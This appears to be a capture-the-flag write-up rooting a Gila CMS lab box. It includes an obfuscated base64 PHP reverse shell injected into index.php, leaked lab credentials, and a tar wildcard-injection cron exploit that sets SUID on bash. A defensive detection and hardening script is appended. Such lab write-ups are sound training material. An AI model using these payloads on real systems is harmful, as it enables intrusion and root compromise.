Machine Info
Difficulty: Medium🟧
Link: HERE
Avg time: 75 Minutes
OS: Linux
Description: Can you root this Gila CMS box?
Recon
INFO: Before running nmap we are told to add [IP] cmess.thm to /etc/hosts
Standard nmap scan:
sudo nmap cmess.thm -Pn -sV -sC -p- -T4 -n -O -oN scan.txt
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-15 13:54 +0200
Nmap scan report for cmess.thm (10.114.129.136)
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds
Scan reveals:
- 22/tcp - SSH
- 80/tcp - HTTP
HTTP has a robots.txt with 3 disallowed entries:
- /src/
- /themes/
- /lib/
Shell as www-data
My first thought was to visit /src/. It redirected to something that looked like a potential LFI, but no matter what I tried I couldn't retrieve /etc/passwd, and RFI didn't work either.
INFO: The other entries in robots.txt behaved the same; I tested them but found nothing.
Later I ran Feroxbuster, which turned up some unusual files and directories:
sudo feroxbuster -u 'http://cmess.thm/' -r -C 404
403 GET 9l 28w 274c http://cmess.thm/lib/?url=lib
403 GET 9l 28w 274c http://cmess.thm/src/?url=src
403 GET 9l 28w 274c http://cmess.thm/themes/?url=themes
200 GET 107l 290w 3851c http://cmess.thm/index
200 GET 44l 113w 1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200 GET 43l 98w 1360c http://cmess.thm/login/password_reset
200 GET 799l 1024w 15763c http://cmess.thm/lib/gila.min.css
200 GET 4l 66w 31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200 GET 92l 266w 3353c http://cmess.thm/about
200 GET 68l 422w 25046c http://cmess.thm/assets/gila-logo.png
200 GET 107l 290w 3851c http://cmess.thm/search
200 GET 107l 290w 3851c http://cmess.thm/blog
200 GET 41l 99w 1580c http://cmess.thm/login
200 GET 109l 291w 3862c http://cmess.thm/category
200 GET 102l 308w 4078c http://cmess.thm/1/hello_world
200 GET 107l 290w 3865c http://cmess.thm/
200 GET 102l 308w 4078c http://cmess.thm/1
200 GET 1l 4w 68c http://cmess.thm/login/register
200 GET 21l 42w 735c http://cmess.thm/feed
200 GET 107l 290w 3851c http://cmess.thm/0
200 GET 101l 272w 3590c http://cmess.thm/author
200 GET 102l 308w 4078c http://cmess.thm/01
200 GET 109l 292w 3874c http://cmess.thm/tag
200 GET 107l 290w 3851c http://cmess.thm/Search
200 GET 92l 266w 3339c http://cmess.thm/About
200 GET 107l 290w 3851c http://cmess.thm/Index
200 GET 0l 0w 0c http://cmess.thm/api
200 GET 1l 4w 68c http://cmess.thm/login/Register
200 GET 14l 40w 563c http://cmess.thm/assets/?url=assets
500 GET 0l 0w 0c http://cmess.thm/cm
200 GET 0l 0w 0c http://cmess.thm/fm
200 GET 107l 290w 3851c http://cmess.thm/INDEX
200 GET 0l 0w 0c http://cmess.thm/login/callback
There was some odd output, but most of it was either not found or the main page. The only thing that caught my attention was a possible IDOR.
http://cmess.thm/0
It returned the home page with a post containing its title and body, but
http://cmess.thm/1
returned title, posted-by and body, with the posted-by field empty, which was weird. I did try other numbers such as 2, 3 and 4, but they returned not found, so it was a rabbit hole. Ferox also revealed the path /login/register, but it redirected to a 404 — another rabbit hole. I also tried brute force on login/ with the guessed email admin@cmess.thm, but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end, so I tried subdomain enumeration with ffuf.
ffuf -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 522 -c
This finally gave a serious lead:
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cmess.thm
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.cmess.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 522
________________________________________________
dev [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
Adding dev.cmess.thm to /etc/hosts and visiting it revealed a black page with a Development Log containing credentials for andre@cmess.thm:
## Development Log
### andre@cmess.thm
Have you guys fixed the bug that was found on live?
### support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
### support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
### andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
### support@cmess.thm
Your password has been reset. Here: KPFTN_f2yxe%
Credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At /admin/fm there is a list of files and directories. Editing index.php can give a shell. Penelope was used as it handles and stabilizes the shell automatically.
INFO: In this file list there was an interesting file, config.php, containing root credentials for MySQL, maybe useful for later.
Code injected into index.php:
<?php system('printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'); ?>
After saving and visiting the main page, Penelope catches a shell as www-data.
Shell as Andre
Password reuse from the login page was attempted but didn't work. linpeas and pspy64 were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes, but it wasn't investigated further at this point.
INFO: The cronjob wasn't investigated yet because write access to /home/andre was required.
linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually /opt was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was .password.bak with Andre's password.
www-data@cmess:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 22 root root 4096 Feb 6 2020 ..
-rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
andres backup password
UQfsdCB7aAP6
Flag located at: /home/andre/user.txt
Shell as Root
The root cronjob was performing a backup of every file in /home/andre/backup.
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
The * wildcard is the key: the shell expands it to bare filenames before tar ever runs, and tar supports --checkpoint options that execute a command at intervals. By creating files named --checkpoint=1 and --checkpoint-action=exec=[command] inside the backup directory, tar interprets them as its own options instead of files to archive.
INFO: Different explanation of tar wildcard injection HERE
A malicious shell.sh was created with the following payload:
#!/bin/bash
chmod +s /bin/bash
Execute permission was added and checkpoint files were created:
chmod +x shell.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=bash shell.sh"
Final state of the backup directory:
andre@cmess:~/backup$ ls -al
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 .
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
-rw-rw-r-- 1 andre andre 1 Jun 15 06:14 --checkpoint=1
-rw-rw-r-- 1 andre andre 1 Jun 15 06:14 --checkpoint-action=exec=bash shell.sh
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note
-rwxrwxr-x 1 andre andre 32 Jun 15 06:12 shell.sh
After the cronjob fired, shell.sh was executed as root and SUID was set on /bin/bash, allowing a root shell via bash -p.
Flag located in /root/root.txt
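An added example (not from the writeup) showing the defender's side of the cron line above: a check that flags option-shaped filenames in a backup directory, and the hardened tar invocation, where `--` ends option parsing so every glob result is treated as a file. It assumes GNU tar and mktemp are available; the sample directory is constructed inside the script.

```shell
#!/bin/sh
# Added example, not from the writeup. (1) spot filenames that tar would
# parse as options, (2) run the backup so that they cannot be.
# Assumes GNU tar and mktemp are present.
set -eu

# Constructed sample: a benign file plus two option-shaped names, the same
# shape as the checkpoint files in the writeup. Prints the directory path.
make_sample_dir() {
  d=$(mktemp -d)
  echo "backup me" > "$d/note"
  : > "$d/--checkpoint=1"
  : > "$d/--checkpoint-action=exec=echo INJECTED"
  printf '%s\n' "$d"
}

# Detection: list entries whose names begin with '-'. These are exactly the
# names an unquoted '*' would hand to tar as flags. One per line; none if clean.
find_option_like_names() {
  for f in "$1"/-*; do
    [ -e "$f" ] || continue
    printf '%s\n' "${f##*/}"
  done
}

# Hardened backup: same archive the cron job wanted, but '--' marks the end
# of options, so '--checkpoint=1' is archived as a file and never interpreted.
# Returns tar's exit status.
safe_backup() {
  dir=$1; out=$2
  ( cd "$dir" && tar -zcf "$out" -- * )
}

# Self-check when run directly: show what is flagged, then what got archived.
dir=$(make_sample_dir)
echo "option-like names in $dir:"
find_option_like_names "$dir"
archive=$(mktemp)
safe_backup "$dir" "$archive"
echo "archive members:"
tar -tzf "$archive"
```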